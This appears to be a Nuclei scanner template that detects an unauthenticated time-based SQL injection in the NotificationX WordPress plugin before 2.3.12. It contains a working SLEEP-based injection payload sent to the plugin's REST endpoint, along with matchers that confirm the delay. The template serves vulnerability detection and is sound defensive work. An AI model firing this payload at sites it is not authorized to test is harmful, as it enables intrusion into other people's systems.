2023-07-07 09:38:49 +00:00
id : notificationx-sqli
info :
name : NotificationX < 2.3.12 - SQL Injection
author : theamanrawat
severity : high
description : |
The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks.
2023-10-14 11:27:55 +00:00
remediation : Fixed in version 2.3.12
2023-07-07 09:38:49 +00:00
reference :
- https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb
- https://wordpress.org/plugins/notificationx/
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 2
2024-10-15 10:27:37 +00:00
tags : time-based-sqli,wpscan,sqli,wp,wp-plugin,wordpress,notificationx-sql-injection
2023-07-07 09:38:49 +00:00
http :
- raw :
- |
GET /wp-json/ HTTP/1.1
Host : {{Hostname}}
- |
@timeout : 10s
GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'duration>=6'
- 'status_code == 401'
- 'contains(content_type, "application/json")'
- 'contains(body, "There is no notification created with this id")'
condition : and
extractors :
- type : regex
name : apikey
group : 1
regex :
- '"home":"(.*?)",'
internal : true
2023-10-20 11:41:13 +00:00
2024-10-14 10:18:31 +00:00
# digest: 4b0a00483046022100f473a033b58bb46b8a4779f5d0d2ec2c6543e79bb03a99f69ee0dcf385b1266b022100cf23b383f29c180f3df37238343ed61437997b07640ffa5f62ab36c2da806b94:922c64590222798bb761d5b6d8e72950